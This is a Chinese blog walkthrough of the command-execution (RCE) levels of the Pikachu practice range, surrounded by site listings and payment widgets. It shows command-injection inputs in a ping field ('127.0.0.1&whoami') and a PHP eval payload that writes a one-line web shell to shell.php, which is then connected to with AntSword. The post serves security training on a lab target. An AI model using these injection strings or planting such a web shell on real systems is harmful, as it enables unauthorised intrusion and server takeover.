pikachu靶场(命令执行(RCE)通关教程)

于 2024-06-13 08:34:49 发布
阅读量159 收藏 1
点赞数 10
分类专栏: pikachu靶场 文章标签: pikachu靶场
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74342020/article/details/139633182
版权

第1关 exec "ping"

1.打开网站

看到一个ping的字样,想到这里应该是要写一个IP地址,这里用本地回环地址 

可以看到返回了,根据返回的TTL值,猜想到这里应该是Windows

使用命令可以观看之前写的博客

所以直接写入127.0.0.1&ipconfig,直接出现IP地址

写入 127.0.0.1&whoami

当然,这里还可以执行其他Windows命令,这里就不再演示 

 第2关 exec "eval"

首先来搜索下这个函数

可以看到这个函数会把函数里的字符串作为函数执行

所以在输入框中输入phpinfo();

这里也可以写一个木马

输入payload:fwrite(fopen('shell.php','w'),'<?php eval($_POST[attack]);?>');

虽然返回的是这样

 

但是当我们打开phpstudy的目录

打开蚁剑,连接木马 

连接成功,添加数据

上传成功。 

月敛苏时意
关注
  • 10
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pikachu靶场通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
Pikachu靶场-RCE远程命令/代码执行漏洞~保姆级教程!!!
2301_77360738的博客
05-16 293
全网最最最详细的Pikachu靶场远程命令/代码执行漏洞,看完包会,小白可入!!!
web渗透教程1:pikachu靶场搭建
11-17
带你手把手搭建pikachu靶场环境
pikachu靶场通关
11-19
pikachu靶场通关
pikachu靶场SQL注入.docx
09-13
"Pikachu靶场SQL注入" Pikachu靶场SQL注入是针对Web应用程序的一种攻击手段,通过对Web应用程序的输入参数进行tampering,来达到访问数据库的目的。下面是Pikachu靶场SQL注入的详细知识点: 一、数字型注入(POST...
C#读取WinCC实时和归档数据
06-21
如何在 C#应用程序中读取 WinCC 变量归档数据,资源来自西门子官网
解放鼠标右键 chrome edge 浏览器 插件
06-21
解放鼠标右键 chrome edge 浏览器 插件 开启开发者模式,拖入扩展管理即可使用
Python实战示例自动办公-20 Python文本数据可视化之“词云”图.zip
06-21
自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图自动办公-20 Python文本数据可视化之“词云”图
Pygments-0.11-py2.5.egg
最新发布
06-21
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
基于延迟相乘鉴相的2QPSK调相通信系统仿真
06-21
基于延迟相乘鉴相的2QPSK调相通信系统仿真 为了仿真出误码率与信噪比的关系曲线,模拟信号通过高斯信道,在调制结束后,需要给信号加入高斯白噪声,上述2.4调制结果加入噪声后结果如下图所示,图中信号的信噪比为2dB。 基于延迟相乘鉴相的2QPSK调相通信系统仿真 为了仿真出误码率与信噪比的关系曲线,模拟信号通过高斯信道,在调制结束后,需要给信号加入高斯白噪声,上述2.4调制结果加入噪声后结果如下图所示,图中信号的信噪比为2dB。 基于延迟相乘鉴相的2QPSK调相通信系统仿真 为了仿真出误码率与信噪比的关系曲线,模拟信号通过高斯信道,在调制结束后,需要给信号加入高斯白噪声,上述2.4调制结果加入噪声后结果如下图所示,图中信号的信噪比为2dB。 基于延迟相乘鉴相的2QPSK调相通信系统仿真 为了仿真出误码率与信噪比的关系曲线,模拟信号通过高斯信道,在调制结束后,需要给信号加入高斯白噪声,上述2.4调制结果加入噪声后结果如下图所示,图中信号的信噪比为2dB。
学生住宿管理项目之数据库代码
06-21
学生住宿管理项目之数据库代码
pyzmq-26.0.0b1-cp310-cp310-win_amd64.whl
06-21
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
idea插件之Restful Fast Request-2024.1.5.1
06-21
解压到插件目录,如【C:\Users\admin\AppData\Roaming\JetBrains\IntelliJIdea2024.1\plugins】 重启idea即可
基于SSM框架的网上书城项目源代码+数据库,适合新手练习
06-21
基于SSM框架的网上书城项目源代码+数据库 本地搭建环境:eclipse4.8.0(代号:Photon)、jdk1.8、tomcat8.0、mysql5.7 登录地址:http://localhost:8080/yosebook-ssm 用户名/密码:yosebook/1234 管理员后台登录地址:http://localhost:8080/yosebook-ssm/admin 用户名/密码:liubei/123
“人力资源+大数据+薪酬报告+涨薪调薪”
06-21
人力资源+大数据+薪酬报告+涨薪调薪,在学习、工作生活中,越来越多的事务都会使用到报告,通常情况下,报告的内容含量大、篇幅较长。那么什么样的薪酬报告才是有效的呢?以下是小编精心整理的调薪申请报告,欢迎大家分享。相信老板看到这样的报告,一定会考虑涨薪的哦。
protobuf-3.15.2-cp37-cp37m-win32.whl
06-21
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
高分毕设-绘画学习平台微信小程序的设计实现-API接口基于ssm框架实现
06-21
源码毕业设计高分毕设-绘画学习平台微信小程序的设计实现-API接口基于ssm框架实现.zip 个人经导师指导并认可通过的高分设计项目,评审分98分。主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业。 项目介绍: 绘画学习平台项目, 前端为微信小程序,后端接口为ssm框架实现,项目包含源码、数据库 毕业设计高分毕设-绘画学习平台微信小程序的设计实现-API接口基于ssm框架实现.zip 个人经导师指导并认可通过的高分设计项目,评审分98分。主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业。 项目主要功能: 该项目是一个基于SSM框架开发的绘画学习平台微信小程序,提供了学生、讲师和管理员三大功能模块。学生可注册、登录,并访问首页、课程、文章、论坛和个人中心,进行课程购买、作业管理和发帖互动。管理员能进行用户及内容全方位管理,包括学生、讲师、课程、作业、文章、论坛和系统设置。讲师同享管理员的部分权限,关注课程管理和教学活动。平台注重用户体验,要求界面友好、操作简便以及快速响应,确保在微信小程
2024年欧洲航空耳机市场主要企业市场占有率及排名.docx
06-21
2024年欧洲航空耳机市场主要企业市场占有率及排名.docx
pikachu靶场通关教程
10-20
pikachu靶场是一个用于学习和测试网络安全的平台,主要包括web漏洞、系统漏洞、密码学等多个方面。下面是pikachu靶场通关教程: 1. 下载pikachu靶场并安装phpstudy。 2. 进入pikachu靶场的主页,选择相应的题目进行挑战。 3. 根据题目要求,使用相应的工具和技术进行漏洞利用。 4. 在成功获取flag后,将flag提交到相应的页面进行验证。 5. 重复以上步骤,直到完成所有的挑战。 举例来说,如果你想学习SSRF漏洞,可以参考引用中的payload,将其输入到相应的页面中,然后尝试获取目标网站的敏感信息。如果你想学习权限提升漏洞,可以参考引用中的链接,尝试获取其他用户的权限。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值